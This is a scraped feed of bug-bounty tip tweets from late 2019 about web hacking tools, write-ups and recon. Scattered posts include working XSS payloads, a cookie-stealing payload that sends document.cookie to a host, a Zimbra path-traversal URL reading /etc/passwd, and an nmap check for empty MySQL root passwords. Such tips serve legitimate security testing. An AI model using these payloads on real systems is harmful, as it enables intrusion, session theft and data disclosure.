2020-01-05 21:28:25
2 First time I hear about AppBandit by @websecurify (https://t.co/w2W2Rt6205). Have you heard about it? Is it any good? UI seems nicer than Burp's #BugBounty #BugBountyTip #Infosec
๏ฝ™๏ฝ๏ฝ„๏ฝˆ๏ฝˆ๏ฝ
@s0umadip


2020-01-05 20:06:16
0 awesome-forensics:- A curated list of awesome forensic analysis tools and resources. https://t.co/v9MDCYiQnN #bugbounty #bugbountytips #bugbountytip #forensics https://t.co/bvm7JNYaw0
๏ฝ™๏ฝ๏ฝ„๏ฝˆ๏ฝˆ๏ฝ
@s0umadip


2020-01-05 19:49:57
0 Offensive Security Wireless Attacks - WiFu v3 https://t.co/i77ZcVJyiK InfiniteSkills - Mastering Python -Networking and Security https://t.co/PwaSg3aXtV Choosen Books for easiest road to OSCP from my experiance https://t.co/8fnP5BkVBi #bugbounty #bugbountytips #bugbountytip
Tirtha Mandal
@tirtha_mandal


2020-01-05 13:44:26
2 I would like to thank my good friend @brutelogic for helping me to bypass WAFโค๏ธโค๏ธ It worked like magic. ๐Ÿ˜ #xss #wafbypass #bugbountytip #bugbounty ๐Ÿ˜
bugbountytip
@a_l_e_r_t_1_


2020-01-05 13:43:38
0 <META HTTP-EQUIV="refresh" CONTENT="0; URL=http://;URL=javascript:alert('XSS');"> <SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN> <STYLE>li {list-style-image: url("javascript:alert('XSS')");}</STYLE><UL><LI>XSS</br> #bugbountytips #bugbountytip
bugbountytip
@a_l_e_r_t_1_


2020-01-05 13:40:51
0 "--!><Script%20/K/>confirm(document.domain)</Script%20/K/> 6'%22()%26%25%22%3E%3Csvg/onload=prompt(1)%3E/ '%22--%3E</style></scRipt><scRipt>alert('XSS')</scRipt> "><img src=x onerror=confirm(1);> #bugbountytips #bugbountytip
โ‚ฌ๐”ต๐”ญ๐”ฉ๐”ฌ๐”ฆ๐”ฑ๐” 0๐”ก๐”ข๐”ฏ
@vanshitmalhotra


2020-01-05 06:01:38
1 Stay #CyberSafe Follow Us ๐Ÿ’ฐ๐Ÿ’ฐ https://t.co/iNczOcGmCt Subscribe to Youtube Chanel for Free Tutorials https://t.co/42lWP1DIW0 #BugBounty #BugBountyTip #bugbountytips #penetrationtesting #pentesting #devops #devsecops #cybersecurity #hackerone https://t.co/gyc6PziIKB
โ‚ฌ๐”ต๐”ญ๐”ฉ๐”ฌ๐”ฆ๐”ฑ๐” 0๐”ก๐”ข๐”ฏ
@vanshitmalhotra


2020-01-05 05:57:33
0 Gmail ShortCuts ! Follow Us ๐Ÿ’ฐ๐Ÿ’ฐ https://t.co/iNczOcGmCt Subscribe to Youtube Chanel for Free Tutorials https://t.co/42lWP1DIW0 #BugBounty #BugBountyTip #bugbountytips #penetrationtesting #pentesting #devops #devsecops #cybersecurity #hackerone https://t.co/pkHRBQI2KK
โ‚ฌ๐”ต๐”ญ๐”ฉ๐”ฌ๐”ฆ๐”ฑ๐” 0๐”ก๐”ข๐”ฏ
@vanshitmalhotra


2020-01-05 04:28:29
3 #OSCP Like VMS ! Lets #TryHarder ! Part 2 โ€” Follow Us ๐Ÿ’ฐ๐Ÿ’ฐ https://t.co/iNczOcGmCt Subscribe to Youtube Chanel for Free Tutorials https://t.co/42lWP1DIW0 #BugBounty #BugBountyTip #bugbountytips #penetrationtesting #pentesting #devops #devsecops #cybersecurity #hackerone https://t.co/ofajN5TlU9
โ‚ฌ๐”ต๐”ญ๐”ฉ๐”ฌ๐”ฆ๐”ฑ๐” 0๐”ก๐”ข๐”ฏ
@vanshitmalhotra


2020-01-05 04:23:37
0 #OSCP Like VMS ! Lets #TryHarder ! Part 1 โ€” Follow Us ๐Ÿ’ฐ๐Ÿ’ฐ https://t.co/iNczOcGmCt Subscribe to Youtube Chanel for Free Tutorials https://t.co/42lWP1DIW0 #BugBounty #BugBountyTip #bugbountytips #penetrationtesting #pentesting #devops #devsecops #cybersecurity #hackerone https://t.co/469VcpzzPb
android_security
@pwn0sec


2020-01-05 01:15:15
1 Learning Pentesting for Android devices https://t.co/AR2CVpCENh #bugbounty #bugbountytip #bugbountytips #android
bugbountytip
@a_l_e_r_t_1_


2020-01-04 16:11:56
1 XSS waf bypass challenge... Please share your favorite xss payload for waf bypass... My favorite : ">'><details/open/ontoggle=confirm('XSS')> #bugbountytip #bugbountytips #hackingcommunity
James Nunes
@jamesgnunes


2020-01-04 13:39:08
0 So, @Xiaomi says it has fixed Mi Home Security Camera bug that displayed pictures from other cameras on Google Nest hub. https://t.co/6b5btrAPnk #Xiaomi #Google #bugbountytip #bughead #tech #TechNews #technology #blog #blogger #WordPress
Evan Custodio
@defparam


2020-01-04 00:13:12
0 An HTTP Request Smuggling CL.TE bug lets you redirect a victim connection to a forged endpoint with GET parameters. FYI you can execute a forged graphql query this way on the victim by using: GET /graphql?query=<query> #bugbountytip
m0z
@LooseSecurity


2020-01-03 19:48:43
7 A cool list by @vaib25vicky which indexes useful resources for educating yourself about mobile security! It's a cool area to get into with lots of #bugbounties to be found. https://t.co/AZpQyQNwUN #BugBounty #bugbountytips #bugbountytip
Hendrik
@hendrikvb


2020-01-03 19:46:57
0 Awesome tool to get your target initial recon! #infosec #bugbountytip https://t.co/ysJXq6Yi4t
Bala Elangovรฃn
@balaelangovan03


2020-01-03 18:47:40
1 My first blog about "How to get started in bug bounty? (Newbie's Perspective)". https://t.co/jHSoKDM7Yo #bugbountytips #bugbountytip #bugbounty
Ammar Amer
@cry__pto


2020-01-03 18:30:16
8 Practice part (2): https://t.co/X281shcjyP https://t.co/spNrTQFgSb https://t.co/vHcoFvviU4 https://t.co/sezBbjXqqh https://t.co/lN4dzsQzSK https://t.co/M9acV7uh2L https://t.co/3wpLokyrgW https://t.co/A1qXCSlOA3 https://t.co/XiR5giK6K9 #BugBounty #bugbountytip #hacking #pentest
noobSecurity
@noobsec_org


2020-01-03 02:00:45
5 P1 on new year (zimbra LFI) [https://t.co/Ab4o1tOu0o]/res/I18nMsg,AjxMsg,ZMsg,ZmMsg,AjxKeys,ZmKeys,ZdMsg,Ajx%20TemplateMsg.js.zgz?v=091214175450&skin=../../../../../../../../../etc/passwd%00 #bugbounty #togetherwehitharder #bugbountytips #bugbountytip https://t.co/NH7meUlaH0
m0z
@LooseSecurity


2020-01-02 20:30:41
1 We are almost at 1,000 members in the League of Bounties discord server! Thanks to all the members who always make it a great chat. :) https://t.co/tVOlrpA4KP #bugbountytips #BugBounty2020Goals #bugbountytip
Arshad Aman
@MeArshadaman


2020-01-02 14:57:03
0 When You Go to HackerOne and see Bounty of $20000 but already claimed by someone else, Then #hacking #cybersecurity #BugBounty2020Goals #bugbountytip @Hacker0x01 @Bugcrowd https://t.co/M6xq9TArVj
Selim Enes Karaduman
@Enesdex


2020-01-02 00:02:45
1 Are all subdomains of https://t.co/UJzSqq2q8o in scope or just https://t.co/I6tTfy4Xfw? I found a bug on a subdomain of spotify but I'm confused about its in scope or not #BugBounty #bugbountytips #bugbountytip #hackerone @Spotify @Hacker0x01 @alicanact60 https://t.co/44Xo60yvM9
โ‚ฌ๐”ต๐”ญ๐”ฉ๐”ฌ๐”ฆ๐”ฑ๐” 0๐”ก๐”ข๐”ฏ
@vanshitmalhotra


2020-01-01 16:23:31
0 #Protip: If a website uses your photo and crops them into the avatar, there may be a good chance that the website is using ImageMagick to do that. Follow Us ๐Ÿ’ฐ https://t.co/iNczOcGmCt Subscribe to Youtube Chanel for Free Tutorials https://t.co/42lWP1DIW0 #BugBounty #BugBountyTip
Elsadat โœช
@M0_SADAT


2020-01-01 14:53:06
0 Yaaay, what a great start of 2020!!! Just discovered my 2nd SQL injection on private program @Bugcrowd ! I guess Iโ€™m the 1st hacker found P1 on 2020๐Ÿ”ฅ Happy new year https://t.co/rYxy7EDxzk you made my day๐Ÿ˜‚ #bugbountytip SQLI still alive! #bugbounty #HappyNew2020 #hacking https://t.co/G1GJuet3A4
โ‚ฌ๐”ต๐”ญ๐”ฉ๐”ฌ๐”ฆ๐”ฑ๐” 0๐”ก๐”ข๐”ฏ
@vanshitmalhotra


2020-01-01 12:11:47
3 Thats When We Decided To Become BUG HUNTERS ! โค๏ธ๐Ÿ’ฐ๐Ÿ’ฐ๐Ÿ’ฐ๐Ÿ’ฐ Follow Us ๐Ÿ’ฐ๐Ÿ’ฐ https://t.co/iNczOcGmCt Subscribe to Youtube Chanel for Free Tutorials https://t.co/42lWP1DIW0 #BugBounty #BugBountyTip #bugbountytips #penetrationtesting #pentesting #devops #devsecops #cybersecurity https://t.co/Ki3Tvkbeia
โ‚ฌ๐”ต๐”ญ๐”ฉ๐”ฌ๐”ฆ๐”ฑ๐” 0๐”ก๐”ข๐”ฏ
@vanshitmalhotra


2020-01-01 08:45:22
0 Happy New Year Hackers and Bug Bounty Hunters ! Have an Awesome Year with lots of Bounties and $$ Follow Us ๐Ÿ’ฐ๐Ÿ’ฐ https://t.co/iNczOcGmCt Subscribe to Youtube Chanel for Free Tutorials https://t.co/42lWP1DIW0 #BugBounty #BugBountyTip #bugbountytips #penetrationtesting https://t.co/7t7Lm5yn0r
drivertom
@drivertomtt


2020-01-01 01:50:28
2 Just curious about whether twitter bots click Like merely by hashtag #malware #APT #cybersecurity #bugbounty #bugbountytips #bugbountytip
m0z
@LooseSecurity


2019-12-31 20:50:41
1 Here are 2 tools which are useful for scraping subdomains/directories in javascript files. https://t.co/VCZ4tzZamU by @jobertabma https://t.co/b0NRR2ub2w by the best hacker in the world #bugbounty #bugbountytips #bugbountytip
m0z
@LooseSecurity


2019-12-31 20:45:48
3 I'm still hosting 2 #XSS challenges on my challenge site! https://t.co/cNYQsW7qVi Both were inspired by real bounties I have found! If you haven't already tried your hand at them, it's well worth a go. #bugbounty #bugbountytip #bugbountytips #infosec
Ammar Amer
@cry__pto


2019-12-31 19:40:35
4 #bugbounty tools part (1): tko-subs:https://t.co/Tawtj1NvWc truffleHog:https://t.co/B3OeZDOdH0 subfinder:https://t.co/QqNOKFuHk1 sslScrape:https://t.co/448jbQ2nbw Gobuster:https://t.co/NI2PnTIFdy SecLists:https://t.co/QPSqeXvWix EyeWitness:https://t.co/461kpUL5CA #bugbountytip
Khaled
@Khaled95677506


2019-12-30 17:34:29
0 My 1st RCE๐Ÿ˜Ž With my bro Osama Alaa. Don't forget to test PHP-CGI, it may give you RCE #bugbountytips #BugBounty #bugbountytip https://t.co/iyLami2sWr
โ‚ฌ๐”ต๐”ญ๐”ฉ๐”ฌ๐”ฆ๐”ฑ๐” 0๐”ก๐”ข๐”ฏ
@vanshitmalhotra


2019-12-30 17:32:47
0 StrandHogg Bug - Unpatched Android OS Vulnerability #BugBounty #BugBountyTip #bugbountytips #penetrationtesting #pentesting #devops #devsecops #cybersecurity #ceh #eccouncil #certification #hackerone https://t.co/8Cr6ShD9jf
Nick || hunt4p1zza
@ngkogkos


2019-12-30 16:58:55
0 Need target specific folders list for fuzzing based on robots.txt? Use @TomNomNom's meg tool: 1. meg -c 200 path.txt urls.txt meg_robots 2. cat meg_robots/index | grep "200 OK" | awk '{print $1}'| xargs cat | grep "Disallow:" | awk '{print $2}' | sort -u #bugbountytip #bugbounty
bug bounty tips - Retweet
@BugbountytipsR


2019-12-30 13:22:23
2 CAN YOU EARN $15000 BY CLICKJACKING? Raushan Raj ========== ^This man did [Tag him if you know his twitter handle] #bugbountytips #bugbountytip WriteuP https://t.co/QhE7nmsJEB
โ‚ฌ๐”ต๐”ญ๐”ฉ๐”ฌ๐”ฆ๐”ฑ๐” 0๐”ก๐”ข๐”ฏ
@vanshitmalhotra


2019-12-30 12:21:45
6 โœˆ๏ธUse Telegram bot as a Penetration Testing Framework ๐Ÿ†๐Ÿ†๐ŸŽ–๐ŸŽ–๐Ÿ’ฐ๐Ÿ’ฐ Follow this page and learn Bug Bounty Tips and Tricks https://t.co/27kPwhJVdt #BugBounty #BugBountyTip #bugbountytips #penetrationtesting #pentesting #devops #devsecops #cybersecurity #hackerone
Larouanne Tristan
@Tr4LSecurity


2019-12-30 10:47:25
0 Doing some #pentesting in a company using #maven ? Look for xml file in the user .m2 folder. This contains password easily decryptable https://t.co/dg9nBqjWoT #infosec #hacking #pentest #CyberSecurity #bugbountytips #bugbountytip #java
แƒ’แƒแƒฉแƒ แƒแƒฅแƒ แƒแƒซแƒ” (Gocha Okradze)
@GochaOqradze


2019-12-30 10:34:05
0 #burp #bugbountytips #bugbountytip RCE with Burp Suite intruder + Regex https://t.co/JmpAvEfNr3 via @YouTube
Men up
@uppmen


2019-12-30 00:42:39
0 How did I earn $3133.70 from Google Translator? @Google @TranslateTricks #BugBounty #bugbountytip #BugBounty2020Goals ๐Ÿ˜† https://t.co/nVwersBz1n
Dr.FarFar โ“ฒ
@3XS0


2019-12-29 20:53:47
0 Old #bugbountytip from 5 years ago! https://t.co/4o2f9Wgs7Aย โ€ฆ
ghostlulz
@ghostlulz1337


2019-12-29 19:52:43
13 Source Code Analysis SQLI: https://t.co/m5K3yzo6iU Source Code Analysis XSS: https://t.co/Ke274Lvc9e Source Code Analysis Race Condition: https://t.co/jycSCNE9ms Bug Bounty Book - https://t.co/zJFRZjg5q2 #BugBounty #bugbountytip #bugbountytips #redteam #infosec #xss #dfir https://t.co/vP7FxiOTGH
Nick || hunt4p1zza
@ngkogkos


2019-12-29 18:22:20
0 If you are not using @hacker_'s getallurls Go tool when doing #recon & #bugbounty you are missing out on interesting URLs/endpoints as it fetches from 3 sources: AlienVault/Wayback Machine/Common Crawl. Before using check you are not IP blocked from these. #bugbountytip https://t.co/rj0EjuXs1t
Sahil Ahamad
@ehsahil


2019-12-29 16:11:02
11 Time for #bugbountytip - always look for 3 types of employee in a company from Linkedin or other sources. 1. DevOps/SRE 2. Data Science 3. Tech Interns It will help a lot from your recon perspective and you will be amazed to see the results. #bugbountytips #HappyHacking
ghostlulz
@ghostlulz1337


2019-12-29 15:56:37
5 Clickjacking is an easy $100 - $500 vulnerability. Super easy to find and often forgotten by developers and hunters alike. Easy wins all day. More info on my blog: https://t.co/kcOYSJcbUG #BugBounty #bugbountytips #bugbountytip #infosec #appsec #osint #xss #redteam #dfir https://t.co/4zPbulEHqC
Andy Garcia
@GaelleTjat


2019-12-29 15:49:12
2 For sure horizontal moves require some form knowledge of the vertical ones. Referring to the Cors Lab 3 where you need to know/read XSS in order to solve the lab ๐Ÿคฆ๐Ÿพโ€โ™€๏ธ๐Ÿคฆ๐Ÿพโ€โ™€๏ธ๐Ÿคฆ๐Ÿพโ€โ™€๏ธ #BugBounty #bugbountytip #BugBounty2020Goals
Vishnu Vardhan Gadupudi
@vishu10x00


2019-12-29 15:18:24
0 If you spend most of your time in low speed internet connection like me i.e > 100KB/sec just use Google cloud shell which is free or just use a cheap vps providers like digital ocean :) #bugbountytip https://t.co/CvazXZy8p1
bug bounty tips - Retweet
@BugbountytipsR


2019-12-29 03:45:01
0 "The more you talk, the more they REVEAL" TIP : Check The Server Response Carefully x 3 Tool TIPs: You can modify response by burp [FACEBOOK HACKED] by EVIL BOY AJAY @evilboyajay wRITEUp https://t.co/26eGroHHNu #bugbountytip #bugbountytips
๐Ÿง ๐Ÿดโ€โ˜ ๏ธBorbolla
@renatoborbolla


2019-12-29 03:29:38
0 Best #firefox addons for #Hacking: -HackBar -Cookies Manager+ -User-Agent Switcher -Tamper Data -FoxyProxy Standard -Wappalyzer: -HttpRequester -RESTClient: -Tampermonkey -XSS Me -SQL Inject Me -iMacros -FirePHP #bugbountytips #bugbountytip #hacking #OSINT #Pentesting
Pentester /KรถkBรผre
@GokBoruEfe


2019-12-28 23:40:34
1 Best #firefox addons for #Hacking: -HackBar -Cookies Manager+ -User-Agent Switcher -Tamper Data -FoxyProxy Standard -Wappalyzer: -HttpRequester -RESTClient: -Tampermonkey -XSS Me -SQL Inject Me -iMacros -FirePHP #bugbountytips #bugbountytip #hacking #OSINT #pentest
plenum ๐Ÿ‡น๐Ÿ‡ณ
@plenumlab


2019-12-28 20:52:16
0 There are only two kinds of infosec folks: - Those who say P.O.C - Those who say POC as POK There you have it now you know. #bugbountytips #bugbountytip
Antonio
@HerrJoost


2019-12-28 20:25:31
2 Best budget notebook focused on programming /#bugbounty? #bugbountytip
ghostlulz
@ghostlulz1337


2019-12-28 16:17:21
7 Cross-Origin Resource Sharing (CORS) can be used to bypass the Same Origin Policy(SOP) and read sensitive user data if implemented improperly. Easy wins all day. Learn more on my blog: https://t.co/ZdNpP9a3hy #BugBounty #bugbountytip #bugbountytips #infosec #appsec #osint #cors https://t.co/hR0qm2YeGc
แƒ’แƒแƒฉแƒ แƒแƒฅแƒ แƒแƒซแƒ” (Gocha Okradze)
@GochaOqradze


2019-12-28 14:58:50
0 #bugbountytips #bugbountytip #Brutelogic #knoxss Thank @rodoassis for this test page. When you love xss and try do it in your phone browser: Android mozilla https://t.co/sRV8TzIgIP
ghostlulz
@ghostlulz1337


2019-12-28 13:31:41
30 If your looking to make a living doing bug bounties or penetration testing you may want to get a copy of my book: https://t.co/zJFRZjg5q2 #bugbounty #xss #osint #redteam #bugbountytips #bugbountytip #infosec https://t.co/fVT4hqpfpi
Ashish Kunwar
@D0rkerDevil


2019-12-28 12:50:58
1 #bugbountytip do asn lookups and do nmap scan on cidr range[s]. and you might end up with jucy services like rpcbind , snmp etc or panels having default creds.
Nouroz Gaming
@NourozGaming


2019-12-28 10:01:10
1 Best #firefox addons for #Hacking: -HackBar -Cookies Manager+ -User-Agent Switcher -Tamper Data -FoxyProxy Standard -Wappalyzer: -HttpRequester -RESTClient: -Tampermonkey -XSS Me -SQL Inject Me -iMacros -FirePHP #bugbountytips #bugbountytip #hacking #OSINT #pentest
Ammar Amer
@cry__pto


2019-12-28 08:15:48
9 Best #firefox addons for #Hacking: -HackBar -Cookies Manager+ -User-Agent Switcher -Tamper Data -FoxyProxy Standard -Wappalyzer: -HttpRequester -RESTClient: -Tampermonkey -XSS Me -SQL Inject Me -iMacros -FirePHP #bugbountytips #bugbountytip #hacking #OSINT #pentest
Ammar Amer
@cry__pto


2019-12-28 07:58:17
17 Reverse Shell Cheat Sheet TooL: https://t.co/ROjGR5MCTl #bugbountytip #hacking #pentest https://t.co/00p6QbX7sO
Ammar Amer
@cry__pto


2019-12-28 07:53:24
7 JexBoss: Jboss (and Java Deserialization Vulnerabilities) verify and EXploitation Tool: https://t.co/EMKunAzMS5 #bugbountytip #hacking #pentest
m0z
@LooseSecurity


2019-12-28 00:51:41
0 A nice find by @s3c_krd which is definitely worth checking out: https://t.co/JRj3kv0zDI CRLF Injection is kinda rare to come by these days, but and this was a cool PoC on Twitter. :) #bugbounty #bugbountytip #bugbountytips
Th3Alch3mist~
@Debian_Hunter


2019-12-27 17:06:41
2 Found this in a write-up and this is cool ....have a look XSSI:- https://t.co/s6baugCH6l JSONP:- https://t.co/BNkRFlwTnN #bugbountytips #bugbounty #bughunting #bugbountytip https://t.co/9SXzd4t9Kw
Tinu rockk
@TinuRock007


2019-12-27 15:41:10
0 finally secure @sony 2019 arrived as xmas gift :) #swag #bugbountytips #bugbountytip #cybersecurity #sony #hackerone #togetherwehitharder https://t.co/77H3eJ2uV9
Mashoud1122
@mashoud1122


2019-12-27 09:28:34
2 Did my 1st collab with @OriginalSicksec and @Skeletorkeys We got an amazing XSS on https://t.co/mVGZMsShQL WAF Bypass used: document.write(atob('PGltZyBzcmM9aHR0cDovL2xvY2FsaG9zdDo4MDkvcD89') + btoa(document.cookie) + '>') #bugbountytips #bugbountytip #BugBounty https://t.co/xkL6Dr47ed
D ฮž ฮž P ฮ› K โš™๏ธ
@Deepak_maxx


2019-12-27 06:40:48
0 Hey @NahamSec just so you know people in India pronounce your name as "Ben shani-singhnapur" ! ๐Ÿ™ƒ #bugbounty #bughunter #bugbountytips #bugbountytip
cor3_cls
@cor3_cls


2019-12-26 20:01:06
3 @enigmaticsoulrg @zPrototype2 @gobias_infosec paid: @PentesterLab. Free: @hacker0x01 Hacker101 site and CTF. @Bugcrowd levelup and university <3 (youtube & git), and the best for me is @PortSwigger @WebSecAcademy Also #bugbountytip hashtag and @intigriti tips are very informative.
Karna
@karna__1


2019-12-26 17:56:24
0 To all those who want to know 'How do I get started with Bug Bounties?', go through the threads! #bugbounty #bugbountytips #infosec #bugbountytip #gettingstarted https://t.co/kgXdWqIHJ2
D ฮž ฮž P ฮ› K โš™๏ธ
@Deepak_maxx


2019-12-26 13:09:29
5 Port scanning can be seen as, or construed as, a crime. We should never execute a port scanner against any website or IP address without explicit, written permission from the owner of the server or computer that you're targeting #infosecurity #infosec #cybersecurity #bugbountytip
Ajay Gautam
@evilboyajay


2019-12-26 10:29:34
2 Check out my new blog about Bypassing Brand Collabs Manager Eligibility. #bugbountytip #bugbounty #cybersecurity https://t.co/VpLI1UNVz6
Nassec.io
@nassecio


2019-12-26 10:26:23
3 @evilboyajay has a new write up for the bug bounty community. Check out our weekly blog about Brand Collabs Manager bypass on Facebook. #infosec #infosecmatters #hacking #bugbounty #bugbountytip https://t.co/4TDqHCMUso
Andy InfoSec
@AndyInfoSec_


2019-12-26 07:22:01
0 Part 3: Resources about #GraphQL #bugbounty Facebook GraphQL CSRF: https://t.co/7LnN4yo1Zp Tools : https://t.co/I52mNTERIN https://t.co/MHIuNuvaHC https://t.co/qlCtI5KJMI https://t.co/LPOkb9LtSj #cybersecurity #bugbountytip #bug #bounty #vapt #andyinfosec
Texy45
@RegisDeldicque


2019-12-26 06:06:42
0 @yeswehack @intigriti #bugbountytips #bugbountytip Tips : if your target forward http to https urls, try to add %0a char at the end of http urls. You could probably find out juicy paths.
Asad Anwar
@AsadAnw90


2019-12-25 23:25:13
0 Always look "view-source" page, sometime html page containing secret key. #bugbountytip #bugbounty https://t.co/VxzIgzVd06
Cryptographer
@crypt0gr4ph3r


2019-12-25 16:50:02
0 #bugbountytip When token says invalid on password change when unauthorisation. Try to use the same invalid token when authorisation. Low severity acount takeover , awarded $200 bounty #hackerone #bugbounty #hacker101
โ‚ฌ๐”ต๐”ญ๐”ฉ๐”ฌ๐”ฆ๐”ฑ๐” 0๐”ก๐”ข๐”ฏ
@vanshitmalhotra


2019-12-25 07:22:52
0 OWASP Events Calendar - Follow Us ๐Ÿ’ฐ๐Ÿ’ฐ๐Ÿ’ฐ๐Ÿ’ฐ https://t.co/iNczOcGmCt Subscribe to Youtube Chanel for Free Tutorials https://t.co/42lWP1DIW0 #BugBounty #BugBountyTip #bugbountytips #pentesting #devsecops #cybersecurity #ceh #eccouncil #owasp #hackerone https://t.co/q2BFcxrK65
โ‚ฌ๐”ต๐”ญ๐”ฉ๐”ฌ๐”ฆ๐”ฑ๐” 0๐”ก๐”ข๐”ฏ
@vanshitmalhotra


2019-12-25 07:14:39
3 Windows Process Hacking Library Follow Us ๐Ÿ’ฐ๐Ÿ’ฐ๐Ÿ’ฐ๐Ÿ’ฐ https://t.co/iNczOcGmCt Subscribe to Youtube Chanel for Free Tutorials https://t.co/42lWP1DIW0 #BugBounty #BugBountyTip #bugbountytips #pentesting #devsecops #cybersecurity #ceh #FolloMe https://t.co/t6TtdwgfQm
Sayaan Alam
@ehsayaan


2019-12-25 06:01:11
0 Finally Done with LazyRecon Set-Up on Ubuntu VM , Thanks to @NahamSec For this great script.. #bugbountytip #bugbounty https://t.co/XLxtx3FAKS
warbid
@id_warb


2019-12-25 02:02:44
0 Why does everyone talk about PDO if it doesn't work? Yet another case IRL. #bugbountytip https://t.co/efz78UQSd6
bug bounty tips - Retweet
@BugbountytipsR


2019-12-24 16:22:32
0 WEB CACHE POSITIONING HOST HEADER INJECTION by James Kettle @albinowax #bugbountytip #bugbountytips #bugbounty https://t.co/Lau7339zXG
Jinone
@jinonehk


2019-12-24 07:47:07
1 New Write-up About a dom xss From a private project 500$ https://t.co/oa4JnqhtwB Merry Christmas to you all ! Thanks @Hacker0x01 #TogetherWeHitHarder #BugBounty #bugbountytip
Ammar Amer๐Ÿ‡ธ๐Ÿ‡พ
@cry__pto


2019-12-24 07:40:18
3 Finding root accounts with an empty password in MySQL servers: nmap -p3306 --script mysql-empty-password xx.xx.xx.xx #Hacking #bugbountytip #Pentesting
Sayaan Alam
@ehsayaan


2019-12-24 02:32:45
0 Yay!!! Another 10k Awarded From TataCliq For Multiple Rate Limiting Issues!!! Great BB Program.. 2 More Triaged.. #bugbounty #bugbountytip #togetherwehitharder
Ricardo Freitas
@0x61737078


2019-12-24 02:11:26
0 RT @andripwn: RT @pwn0sec: Web cache poisoning attack https://t.co/6f6dxXBZTL #bugbounty #bugbountytip #bugbountytips #webcache_poisoning_attack
Ash
@m0rph1n3e


2019-12-23 23:15:55
0 is it possible to bypass the file extension in Local File Inclusion? URL Example: https://blahblahblah/?language=english which reads from english.html ( only html files ) #bugbounty #bugbountytip #bugbountytips #hacker0x01 #LFI
Security Executions Code
@pwn0sec


2019-12-23 20:58:18
0 File Path Traversal Using Burp-suite (Intruder) https://t.co/CmPakEgzfB #bugbountytip #bugbountytips #path_traversal #burpsuite #intruder
ghostlulz
@ghostlulz1337


2019-12-23 17:03:56
9 A Race Condition allowed one person to steal over $1,000,000 dollars from an ATM. If your curious how to detect these type of flaws check out my blog: https://t.co/jycSCNE9ms #BugBounty #bugbountytip #bugbountytips #infosec #redteam #osint #xss #pentest #appsec #DFIR https://t.co/DxXsgzyZ0Z
โ‚ฌ๐”ต๐”ญ๐”ฉ๐”ฌ๐”ฆ๐”ฑ๐” 0๐”ก๐”ข๐”ฏ
@vanshitmalhotra


2019-12-23 11:05:40
2 Top #pentesting and Bug Bounty Burp Extensions https://t.co/naoLUFqmPu #hackdoor #bugbounty #bugbountytip #bugbountytips #hacker #penetrationtesting #pentesting #devops #devsecops
โ‚ฌ๐”ต๐”ญ๐”ฉ๐”ฌ๐”ฆ๐”ฑ๐” 0๐”ก๐”ข๐”ฏ
@vanshitmalhotra


2019-12-23 11:03:19
4 Hardware Hacker Bee #hackdoor #bugbounty #bugbountytip #bugbountytips #hacker #penetrationtesting #pentesting #devops #devsecops https://t.co/KHAvODLYHa
แƒ’แƒแƒฉแƒ แƒแƒฅแƒ แƒแƒซแƒ” (Gocha Okradze)
@GochaOqradze


2019-12-22 21:40:06
1 #bugboutytips, #bugbountytip, #burp Detect file path traversal by Burp Suite intruder + regext https://t.co/T1xb4tCsLV via @YouTube
แƒ’แƒแƒฉแƒ แƒแƒฅแƒ แƒแƒซแƒ” (Gocha Okradze)
@GochaOqradze


2019-12-22 21:37:21
2 #bugbountytip, #bugbountytips, #burp, #xss Easy way detect easy reflect XSS. Easy Reflect XSS Burp Intruder https://t.co/oYRVhwD1VA via @YouTube
Ammar Amer๐Ÿ‡ธ๐Ÿ‡พ
@cry__pto


2019-12-22 16:49:04
0 Pentesting-Bible #hacking #pentest #redteam #OSINT #malware #CyberSecurity #ctf #bugbountytip it is just the beginning!๐Ÿ‘๐Ÿ˜Ž https://t.co/MmUnOQkJ7a
Andy Garcia
@GaelleTjat


2019-12-22 16:48:33
0 Great reading. #Infosec #Infosectips #bugbountytip https://t.co/NmloxT9KE3
Sunil
@Sunilkande1137


2019-12-22 14:33:19
0 Vimeo upload function SSRF by @dPhoeniixx https://t.co/DMIZfZoHJA #hacking #pentesting #bugbounty #recon #pentest #infosec #cybersecurity #itsecurity #websecurity #appsec #hacker #security #Hackers #Android #Androidhacking #bugbountytips #bugbountytip #hackerone #ssrf #hacking
เคˆเคถเคพเคจ เคธเคฟเค‚เคน
@R0X4R


2019-12-22 13:23:57
1 Filter bypass for xss in input tag. #bugbountytip #bugbounty #xss #hacking #happytosecure #bugbountycommunity #bugbountytips https://t.co/98c2ORAMwW
Karna
@karna__1


2019-12-22 13:08:46
0 Converted IP formats can be used to bypass blacklisted IP addresses while trying SSRFs. You just need to do 3 steps and you can convert formats at any time using your terminal. Happy Hunting! #bugbountytip #bugbountytips #infosec #AUTOMATION (2/2)
Ammar Amer๐Ÿ‡ธ๐Ÿ‡พ
@cry__pto


2019-12-22 08:56:42
1 -1-2000 articles as pdf files & 2000 links to advanced articles and resources about different fields of ethical hacking and programing -2-114 detailed osint tips: -how to gather info & why -useful tools https://t.co/xGKKQoPyyq #bugbountytip #Hacking #OSINT #Pentesting #redteam
Brodie Codie โ„ข
@brodie_codie


2019-12-22 07:31:56
0 Not a bad week, submitted 5 Cross-site scripting (XSS) vulnerability Reports... now the waiting game begins <a onmouseover="alert(document.cookie)">xxs link</a> "><img src=x onerror=alert(domain)> #bugbountytips #bugbountytip
เคˆเคถเคพเคจ เคธเคฟเค‚เคน
@R0X4R


2019-12-22 04:58:41
1 Filter bypass for xss in input tag. #bugbountytip #bugbounty #xss #hacking #happytosecure #bugbountycommunity #bugbountytips https://t.co/9vrKqD7lnY
Hendrik
@hendrikvb


2019-12-21 21:00:28
0 Obviously whatweb (@urbanadventur3r) will provide interesting results too! #bugbountytip https://t.co/z1uuPGsmcZ
ghostlulz
@ghostlulz1337


2019-12-21 13:04:48
4 ๐ŸŽ… MERRY CHRISTMAS ๐ŸŽ… If you'r looking for a good read over the holiday you should check out my Bug Bounty Book. Instead of spending money you could be making money๐Ÿ’ฐ https://t.co/zJFRZjg5q2 #BugBounty #bugbountytips #bugbountytip #osint #xss #appsec #dfir #redteam #hackers https://t.co/wWp4w7lmFM
drivertom
@drivertomtt


2019-12-21 12:13:30
0 How to defeat webshell scanners #bugbountytips #bugbountytip https://t.co/A79IMJYhtk
bug bounty tips - Retweet
@BugbountytipsR


2019-12-21 04:46:45
